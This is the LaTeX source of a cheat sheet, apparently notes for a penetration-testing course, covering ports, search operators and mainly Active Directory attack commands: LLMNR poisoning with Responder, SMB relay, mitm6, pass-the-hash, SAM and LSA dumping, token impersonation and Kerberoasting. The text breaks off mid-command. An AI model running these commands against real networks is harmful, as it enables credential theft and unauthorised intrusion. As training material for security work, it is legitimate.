\documentclass[10pt,a4paper]{article} % Packages \usepackage{fancyhdr} % For header and footer \usepackage{multicol} % Allows multicols in tables \usepackage{tabularx} % Intelligent column widths \usepackage{tabulary} % Used in header and footer \usepackage{hhline} % Border under tables \usepackage{graphicx} % For images \usepackage{xcolor} % For hex colours %\usepackage[utf8x]{inputenc} % For unicode character support \usepackage[T1]{fontenc} % Without this we get weird character replacements \usepackage{colortbl} % For coloured tables \usepackage{setspace} % For line height \usepackage{lastpage} % Needed for total page number \usepackage{seqsplit} % Splits long words. %\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely. \usepackage[normalem]{ulem} % For underlining links % Most of the following are not required for the majority % of cheat sheets but are needed for some symbol support. \usepackage{amsmath} % Symbols \usepackage{MnSymbol} % Symbols \usepackage{wasysym} % Symbols %\usepackage[english,german,french,spanish,italian]{babel} % Languages % Document Info \author{gad} \pdfinfo{ /Title (peh-cheatsheat.pdf) /Creator (Cheatography) /Author (gad) /Subject (peh-cheatsheat Cheat Sheet) } % Lengths and widths \addtolength{\textwidth}{6cm} \addtolength{\textheight}{-1cm} \addtolength{\hoffset}{-3cm} \addtolength{\voffset}{-2cm} \setlength{\tabcolsep}{0.2cm} % Space between columns \setlength{\headsep}{-12pt} % Reduce space between header and content \setlength{\headheight}{85pt} % If less, LaTeX automatically increases it \renewcommand{\footrulewidth}{0pt} % Remove footer line \renewcommand{\headrulewidth}{0pt} % Remove header line \renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit % This two commands together give roughly % the right line height in the tables \renewcommand{\arraystretch}{1.3} \onehalfspacing % Commands \newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % 
Shortcut for row colour \newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols \newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns \newcommand{\tn}{\tabularnewline} % Required as custom column type in use % Font and Colours \definecolor{HeadBackground}{HTML}{333333} \definecolor{FootBackground}{HTML}{666666} \definecolor{TextColor}{HTML}{333333} \definecolor{DarkBackground}{HTML}{6936A3} \definecolor{LightBackground}{HTML}{F5F2F9} \renewcommand{\familydefault}{\sfdefault} \color{TextColor} % Header and Footer \pagestyle{fancy} \fancyhead{} % Set header to blank \fancyfoot{} % Set footer to blank \fancyhead[L]{ \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{C} \SetRowColor{DarkBackground} \vspace{-7pt} {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}} } \end{tabulary} \columnbreak \begin{tabulary}{11cm}{L} \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{peh-cheatsheat Cheat Sheet}}}} \\ \normalsize{by \textcolor{DarkBackground}{gad} via \textcolor{DarkBackground}{\uline{cheatography.com/183164/cs/38127/}}} \end{tabulary} \end{multicols}} \fancyfoot[L]{ \footnotesize \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{LL} \SetRowColor{FootBackground} \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\ \vspace{-2pt}gad \\ \uline{cheatography.com/gad} \\ \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\ \vspace{-2pt}Not Yet Published.\\ Updated 31st May, 2023.\\ Page {\thepage} of \pageref{LastPage}. 
\end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\ \SetRowColor{white} \vspace{-5pt} %\includegraphics[width=48px,height=48px]{dave.jpeg} Measure your website readability!\\ www.readability-score.com \end{tabulary} \end{multicols}} \begin{document} \raggedright \raggedcolumns % Set font size to small. Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{multicols*}{3} \begin{tabularx}{5.377cm}{p{2.14011 cm} x{2.83689 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Ports}} \tn % Row 0 \SetRowColor{LightBackground} ftp & 21 \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} ssh & 22 \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} telnet & 23 \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} smtp & 25 \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} POP3 & 110 \tn % Row Count 5 (+ 1) % Row 5 \SetRowColor{white} IMAP & 143 \tn % Row Count 6 (+ 1) % Row 6 \SetRowColor{LightBackground} smb & 139, 445 \tn % Row Count 7 (+ 1) % Row 7 \SetRowColor{white} DNS & 53 \tn % Row Count 8 (+ 1) % Row 8 \SetRowColor{LightBackground} TFTP & 69 \tn % Row Count 9 (+ 1) % Row 9 \SetRowColor{white} SNMP & 161 \tn % Row Count 10 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{MISCELLANEOUS}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Google Fu}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{use quotation marks to 
find only results that contain the text within the quotation marks.} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}"Introduction to Cryptography"} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{use the `site` keyword to only find results from a specific website.} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}Introduction to Cryptography site:stackexchange.com} \tn % Row Count 7 (+ 4) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{use the filetype keyword to search for specific file types.} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}Introduction to Cryptography -review filetype:pdf} \tn % Row Count 11 (+ 4) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{use the allintitle option to search the titles of web pages for your provided keyword/text} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}allintitle:index of} \tn % Row Count 14 (+ 3) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{use the inurl option to search for the existence of a particular string in a URL} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}inurl:admin site:someadminsite.com} \tn % Row Count 17 (+ 3) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{to get results that contain links/redirects to example.com} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}link:example.com} \tn % Row Count 20 (+ 3) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{use the * wildcard to do a wildcard search for results that have anything in place of the * but must begin and end with "hack" and "VPN" respectively} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}"hack * VPN"} \tn % Row Count 24 (+ 4) % Row 7 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{to return results of websites that 
offer similar services to amazon.com, useful if you want to know other competitors for a particular service} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}Dell Laptop related:amazon.com} \tn % Row Count 28 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}-} \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{More on Google Fu here: \seqsplit{https://www.blackhat.com/presentations/bh-europe-05/BH\_EU\_05-Long.pdf}} \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{File transfers}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{sdsdf} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}sdsf} \tn % Row Count 2 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Spawning TTY shells}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{\{\{link="https://wiki.zacheller.dev/pentest/privilege-escalation/spawning-a-tty-shell"\}\}Link 1\{\{/link\}\}} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{\{\{link="https://github.com/ahmetgurel/Pentest-Hints/blob/master/Spawning\%20a\%20TTY\%20Shell.md"\}\}Link 2\{\{/link\}\}} \tn % Row Count 6 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{More metasploit}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To search for metasploit modules within a metasploit module directory} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}search {\bf{/path/to/msf/module}} -t 
{\bf{search\_string}}\{\{nl\}\}search exploits/linux -t ftp`} \tn % Row Count 5 (+ 5) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Load metasploit plugins during a meterpreter session} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`load {\bf{plugin-name}}`} \tn % Row Count 8 (+ 3) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Get help on a plugin} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`help` \textgreater{}\textgreater{} scroll down} \tn % Row Count 10 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{ACTIVE DIRECTORY}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Gaining Initial Foothold}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Use Responder to capture NTLMv2 hashes via LLMNR poisoning} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}responder -I eth0 -r`} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Crack the captured NTLMv2 hash with hashcat} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}hashcat -m 5600 ntlmhash.txt dictionary.txt`} \tn % Row Count 6 (+ 3) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Use nmap to enumerate the domain for targets with SMB signing disabled} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}nmap -{}-script=smb2-security-mode.nse -p445 192.168.57.0/24`} \tn % Row Count 10 (+ 4) % Row 3 \SetRowColor{white} 
\mymulticolumn{1}{x{5.377cm}}{If SMB signing is disabled, an SMB relay attack is likely possible} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}SMB=Off and HTTP=Off and HTTPS=Off in `\{\{lang-plaintext\}\}/etc/responder/Responder.conf`} \tn % Row Count 14 (+ 4) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Then use ntlmrelayx.py to relay the hashes captured by Responder to the target computer and dump its local SAM hashes.} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}responder -I eth0 -r` then `\{\{lang-plaintext\}\}./ntlmrelayx -tf targets.txt -smb2support`} \tn % Row Count 20 (+ 6) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To get an interactive SMB shell} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}./ntlmrelayx -tf targets.txt -smb2support -i`} \tn % Row Count 23 (+ 3) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Using psexec.py, smbexec.py or wmiexec.py for gaining shell access} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}./psexec.py \seqsplit{GOLD.local/jsnow:johnsnow@192.168.219.5`}} \tn % Row Count 27 (+ 4) % Row 7 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Using metasploit psexec} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}use windows/smb/psexec` \textgreater{}\textgreater{} set options \textgreater{}\textgreater{} `run`} \tn % Row Count 30 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Gaining Initial Foothold (cont)}} \tn % Row 8 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Exploiting IPv6 to create an arbitrary domain user on the domain via a mitm6 attack} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 
px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}mitm6 -d GOLD.local` \textgreater{}\textgreater{} `\{\{lang-plaintext\}\}ntlmrelayx -6 -tf targets.txt -wh wpad.GOLD.local -l adlootdir`} \tn % Row Count 5 (+ 5) % Row 9 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Passback attack on MFP devices (e.g, printers)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}nc -L -p 389` on attack machine \textgreater{}\textgreater{} enumerate domain for MFPs \textgreater{}\textgreater{} login to MFP \textgreater{}\textgreater{} change LDAP server on MFP to attack IP \textgreater{}\textgreater{} capture hashes on attack machine} \tn % Row Count 10 (+ 5) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Sweep domain for MFP devices using metasploit's httpversion} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}To be edited} \tn % Row Count 13 (+ 3) % Row 11 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}Enumerate, Enumerate, Enumerate} \tn % Row Count 15 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Post-Compromise Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To get the Resultant Group Policy config that has been applied on a host. 
This will output what GPO took precedence for a given config.} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`gpresult /h output.html`} \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Find file shares on a domain} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`Invoke-ShareFinder` OR `Find-DomainShare`} \tn % Row Count 6 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{{\bf{-{}-{}-{}-{}-{}-{}- Enumerating with PowerView -{}-{}-{}-{}-{}-{}-}}} \tn % Row Count 7 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Run PowerView} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`. .\textbackslash{}Powerview.ps1`} \tn % Row Count 9 (+ 2) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Get information about the domain (DCs IP, name, ...)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}Get-NetDomain} \tn % Row Count 12 (+ 3) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Get information of DCs on the domain — domain name, IP of DC, DC OS, ...} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}Get-NetDomainController} \tn % Row Count 15 (+ 3) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To get the Default Domain Policy configs} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`Get-DomainPolicy`} \tn % Row Count 17 (+ 2) % Row 7 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Access complete values of any Powershell property name} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}(Get-DomainPolicy).name or Get-DomainPolicy | select name} \tn % Row Count 21 (+ 4) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Get information of users on the domain} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 
px}Get-NetUsers or Get-DomainUser} \tn % Row Count 23 (+ 2) % Row 9 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To fetch just one entity from Get-NetUsers, Get-NetGroups} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`Get-NetUsers -Identity jsnow` or `Get-NetGroups -Identity "Domain Admins"`} \tn % Row Count 27 (+ 4) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Get all admins on a domain} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`Get-NetGroup | Select-Object Name | Select-String "admin"` or `Get-DomainGroup | Select-Object Name, admincount | Select-String 1`} \tn % Row Count 31 (+ 4) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Post-Compromise Enumeration (cont)}} \tn % Row 11 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Get all users in a group} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`Get-NetGroupMember -Identity "Enterprise Admins" -Recurse`} \tn % Row Count 3 (+ 3) % Row 12 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{{\bf{-{}-{}-{}-{}-{}-{}- Enumerating with BloodHound -{}-{}-{}-{}-{}-{}-}}} \tn % Row Count 4 (+ 1) % Row 13 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Default usage to collect mappings/data via the SharpHound.ps1 Ingestor (noisy option)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`Invoke-BloodHound -Domain GOLD.local`} \tn % Row Count 7 (+ 3) % Row 14 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Perform more specific collection (less noisy). ? takes the following options: `Group`, `LocalGroup`, `RDP`, `Session`, `Trusts`, `ACL`, `ComputerOnly`} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`Invoke-BloodHound -Domain GOLD.local -CollectionMethod ? 
-{}-ZipFilename output.zip} \tn % Row Count 12 (+ 5) % Row 15 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To collect Sessions currently active on the domain (users log in and out all the time)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`Invoke-BloodHound -CollectionMethod Session -Loop -LoopInterval HH:MM:SS -LoopDuration HH:MM:SS`} \tn % Row Count 17 (+ 5) % Row 16 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{After collection, import the data into the BloodHound GUI on Kali} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`bloodhound`} \tn % Row Count 19 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Post Compromise Attacks}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Dumping SAM NTLM hashes on DC with secretsdump} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}./secretsdump.py -just-dc-ntlm \seqsplit{GOLD.local/domainadminuser:password@192.168.219.140`}} \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Pass a password across a range of computers on the domain} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}crackmapexec smb 10.0.0.1/24 -d GOLD.local -u jsnow -p johnsnow`} \tn % Row Count 8 (+ 4) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Pass a hash across a range of computers on the domain} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}crackmapexec 10.0.0.5 -u jsnow -H {\bf{NThash}}`\{\{nl\}\}`-{}-local-auth` for local account login\{\{nl\}\}`-{}-sam` to dump SAM hashes} \tn % Row Count 13 (+ 5) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Attempt to dump the (local) SAM while running 
Pass-the-password} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}crackmapexec smb 10.0.0.1/24 -d GOLD.local -u jsnow -p johnsnow -{}-sam`\{\{nl\}\}or`secretsdump.py -just-dc-ntlm \seqsplit{GOLD.local/jsnow:johsnow@10.0.0.1`}} \tn % Row Count 19 (+ 6) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To dump LSA secrets on target computer} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}crackmapexec smb 192.168.219.0/24 -d DOMAIN.local -u jsnow -p johnsnow -{}-lsa`} \tn % Row Count 23 (+ 4) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Crack NTLM hashes using hashcat} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}hashcat -m 1000 sam\_hashes.txt rockyou.txt`} \tn % Row Count 26 (+ 3) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Gain remote shell with NTLM hash using ps/smb/wmi-exec} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}./psexec.py win\_one:@10.0.0.5 -hashes {\bf{NTLMhash}}`} \tn % Row Count 30 (+ 4) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Post Compromise Attacks (cont)}} \tn % Row 7 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Token Impersonation (TI) with metasploit} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}use windows/smb/exec` \textgreater{}\textgreater{} set options \textgreater{}\textgreater{} `\{\{lang-plaintext\}\}run` \textgreater{}\textgreater{} `\{\{lang-plaintext\}\}load incognito` \textgreater{}\textgreater{} `\{\{lang-plaintext\}\}list\_tokens -u` \textgreater{}\textgreater{} `\{\{lang-plaintext\}\}impersonate\_token {\bf{DOMAIN}}*{\emph{username}}*`} \tn % Row Count 6 (+ 6) % Row 8 
\SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Add new user via TI attack if impersonated token is admin} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}add\_user {\bf{username}} {\bf{password}}`} \tn % Row Count 10 (+ 4) % Row 9 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Add new (local) user via TI} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}add\_user {\bf{username}} {\bf{password}}`} \tn % Row Count 13 (+ 3) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Add local users to local groups} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}add\_local\_user {\bf{groupname}} {\bf{user\_to\_add}}`} \tn % Row Count 16 (+ 3) % Row 11 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Performing Kerberoasting Attacks -{}- get a TGST} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}/GetUserSPNs.py \seqsplit{GOLD.local/jsnow:johnsnow} -dc-ip 192.168.219.140 -request`} \tn % Row Count 19 (+ 3) % Row 12 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Perform Kerberoasting with user's hash} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}/GetUserSPNs.py \seqsplit{GOLD.local/jsnow:johnsnow} -dc-ip 192.168.219.140 -hashes {\bf{NTLMhash}} -request`} \tn % Row Count 23 (+ 4) % Row 13 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Crack a TGST with hashcat} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}hashcat -m 13100 tgst.txt rockyou.txt -O`} \tn % Row Count 26 (+ 3) % Row 14 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{GPP/cPassword attack -{}- finding the `Groups.xml` file} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}smbclient -L 
